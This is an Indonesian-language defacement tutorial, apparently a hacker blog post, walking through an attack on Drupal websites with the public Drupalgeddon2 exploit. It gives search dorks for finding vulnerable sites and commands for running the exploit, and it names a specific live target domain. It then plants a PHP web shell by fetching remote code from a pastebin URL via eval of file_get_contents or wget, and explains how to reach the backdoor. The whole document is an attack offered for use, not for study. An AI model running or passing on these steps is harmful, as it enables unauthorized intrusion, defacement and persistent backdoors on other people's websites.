DRUPAL GEDDON RCE UPLOAD SHELL

 DRUPAL RCE UPLOAD SHELL

     hai ketemu lagi dengan saya , kali ini saya membagikan tutorial deface menggunakan teknik DRUPAL RCE , tutorial deface ini menggunakan tools di terminal dengan bahasa Ruby . langsung saja tutorial nya ya :)

metode ini di gunakan untuk website yang memakai CMS Drupal

dork :

inurl:"*drupal_ajax"
intext:"powered by drupal"

    dork kembangin

setelah menemukan site drupal tinggal eksekusi pakai tools nya saja


buka terminal :

$ apt-get install git

$ gem install ruby

$ git clone https://github.com/dreadlocked/Drupalgeddon2

buka file nya 

$ cd Drupalgeddon2

cara pakai nya

$ ruby drupalgeddon2.rb <site>

contoh live target :

$ ruby drupalgeddon2.rb http://boatsmedia.in/

jika berhasil nanti web nya ter connect ke terminal lo

  cek dengan perintah

$ uname -a

jika nanti muncul kernal web maka artinya berhasil

tinggal eksekusi deh . kalo mau tanam shell tinggal ketik gini

$ echo '<?php eval("?>".file_get_contents("https://pastebin.com/raw/en5tp4kX"));?>' > shell.php

fungsi nya command di atas adalah membuat file shell.php dengan shell backdoor file get content

jika di buka di web tersebut dan blank , coba pakai cara wget ,  coba command berikut

$ wget https://pastebin.com/raw/en5tp4kX -O shell.php

#tulisan yang saya merahin itu url pastebin LAX shell ( password shell = LAX ) bisa juga di ganti shell kalian sendiri

cara manggil shell nya

http://site.com/shell.php

 

nah berhasil kita tanam shell nya , tinggal eksekusi deh wkwkwk

JIKA UPLOAD SHELL GAGAL KITA LANGSUNG WRITE FILE AJA LEWAT TERMINAL

$ echo ' ISI ' > namafile.php

keluar dari tools nya :

$ exit

sekian tutorial dari saya semoga bermanfaat



thanks to  :

Kamiki Gh0st_Coder
Khalidul Mr.GoKill